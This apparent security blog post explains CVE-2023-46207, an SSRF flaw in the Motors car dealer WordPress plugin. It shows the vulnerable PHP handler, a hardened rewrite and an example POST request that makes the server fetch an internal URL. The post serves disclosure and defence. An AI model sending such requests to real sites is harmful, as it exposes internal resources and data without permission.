Recently, a significant security vulnerability was discovered in the StylemixThemes Motors – Car Dealer, Classifieds & Listing plugin, which is extensively used for creating car dealership and classifieds websites with WordPress. This vulnerability, identified as CVE-2023-46207, is a Server-Side Request Forgery (SSRF) vulnerability that affects all plugin versions from n/a through 1.4.6.

In this post we take a look at the vulnerability from a technical standpoint, with code snippets and links to the original references. By understanding how this vulnerability works, web administrators and developers can better protect their websites against similar weaknesses.

Description

Server-Side Request Forgery (SSRF) is a type of security vulnerability where an attacker can abuse the functionality of a vulnerable server to send requests to other internal or external resources, potentially leading to unauthorized access and information leakage.

In the case of StylemixThemes Motors – Car Dealer, Classifieds & Listing, the SSRF vulnerability allows an attacker to send crafted requests to the vulnerable server and have it fetch internal resources as well as external third-party resources. This can expose sensitive information and may provide an entry point for more severe attacks such as SQL injection or Remote Code Execution (RCE).

Code Snippet

The vulnerability stems from the stm_motors_ajax_add_car_popup_action function in the stm_vehicles_listing/includes/ajax-actions.php file. The user-supplied 'site_url' POST parameter is passed through sanitize_text_field(), which only strips tags and stray whitespace and does not restrict the destination, and is then handed straight to wp_remote_get(). An attacker can exploit this by sending a crafted POST request with 'site_url' set to an internal or external resource.

function stm_motors_ajax_add_car_popup_action()
{
    // Nonce check only: proves the request came from a page of this site,
    // it does not restrict who may call the action or where it may fetch from.
    check_ajax_referer('stm_ajax_nonce', 'nonce');

    // sanitize_text_field() strips tags/whitespace; any scheme, host or port survives.
    $site_url = (!empty($_POST['site_url'])) ? sanitize_text_field($_POST['site_url']) : '';

    if (!empty($site_url)) {
        // SSRF sink: the server fetches the caller-chosen URL and returns the body verbatim.
        $response = wp_remote_get($site_url);
        wp_send_json(array('success' => 'true', 'message' => wp_remote_retrieve_body($response)));
    } else {
        wp_send_json(array('success' => 'false', 'message' => esc_html__('Error: Please specify a site URL', 'stm_vehicles_listing')));
    }

    exit;
}
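For comparison, here is a hardened version of the same handler. This is an added example and not the plugin's own code; it assumes the popup only ever needs to fetch from a fixed set of hosts, and the filter name 'stm_motors_allowed_fetch_hosts' and the function name are hypothetical.

```php
<?php
// Added hardened example, not the plugin's own code. Assumes the popup only
// needs to fetch from a fixed set of hosts; the allowlist filter name
// 'stm_motors_allowed_fetch_hosts' is hypothetical.
function stm_motors_ajax_add_car_popup_action_hardened()
{
    check_ajax_referer('stm_ajax_nonce', 'nonce');

    // A nonce is not an authorization check: require a capability before
    // letting a caller make the server issue outbound requests.
    if (!current_user_can('edit_posts')) {
        wp_send_json_error(array('message' => 'Forbidden'), 403);
    }

    // Only http/https survive esc_url_raw() with this protocol list.
    $raw      = isset($_POST['site_url']) ? wp_unslash($_POST['site_url']) : '';
    $site_url = esc_url_raw($raw, array('http', 'https'));
    if ('' === $site_url) {
        wp_send_json_error(array('message' => 'Error: Please specify a valid http(s) site URL'), 400);
    }

    // Host allowlist: the caller may not choose arbitrary destinations.
    $allowed = apply_filters('stm_motors_allowed_fetch_hosts', array('motors.example')); // hypothetical filter
    $host    = strtolower((string) wp_parse_url($site_url, PHP_URL_HOST));
    if (!in_array($host, array_map('strtolower', $allowed), true)) {
        wp_send_json_error(array('message' => 'Error: Host is not allowed'), 400);
    }

    // wp_safe_remote_get() sets reject_unsafe_urls, so wp_http_validate_url()
    // refuses loopback/private/reserved addresses and non-standard ports as a
    // second layer. No redirects: an allowed host must not bounce us elsewhere.
    $response = wp_safe_remote_get($site_url, array(
        'timeout'             => 5,
        'redirection'         => 0,
        'limit_response_size' => 1024 * 1024,
    ));

    if (is_wp_error($response) || 200 !== wp_remote_retrieve_response_code($response)) {
        wp_send_json_error(array('message' => 'Error: Could not fetch the site URL'), 502);
    }

    wp_send_json_success(array('message' => wp_remote_retrieve_body($response)));
}

// Register for logged-in users only: no wp_ajax_nopriv_ hook for this action.
add_action('wp_ajax_stm_motors_ajax_add_car_popup', 'stm_motors_ajax_add_car_popup_action_hardened');
```

The allowlist is the primary control; wp_safe_remote_get() resolves the host once at validation time, so on its own it does not defend against DNS rebinding between the check and the fetch.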

Exploit Details

1. Craft a POST request to the vulnerable server's wp-admin/admin-ajax.php endpoint with the following parameters:

action: stm_motors_ajax_add_car_popup,

nonce: a valid nonce value,

site_url: the target URL/resource.

For example:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-website.example
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

action=stm_motors_ajax_add_car_popup&nonce=[VALID_NONCE]&site_url=http://internal-resource.local

2. Upon receiving the request, the vulnerable server will fetch the contents of the specified 'site_url' and return it in the response, potentially exposing sensitive information or causing further damage.

Here are some notable references regarding this vulnerability:

1. CVE-2023-46207 at NVD
2. Official StylemixThemes Motors – Car Dealer, Classifieds & Listing Plugin Homepage

Conclusion

The discovered SSRF vulnerability in the StylemixThemes Motors – Car Dealer, Classifieds & Listing plugin (CVE-2023-46207) is a serious security issue that affects all plugin versions from n/a through 1.4.6. As a web administrator or developer working with this plugin, it is crucial to keep your plugins up to date and to ensure that they don't expose vulnerabilities like this SSRF issue that can jeopardize your website's security.

To further protect your websites from potential attacks, always follow best security practices, regularly update your plugins and themes, and monitor your site for any suspicious activities.

Timeline

Published on: 11/13/2023 03:15:09 UTC
Last modified on: 11/16/2023 23:47:25 UTC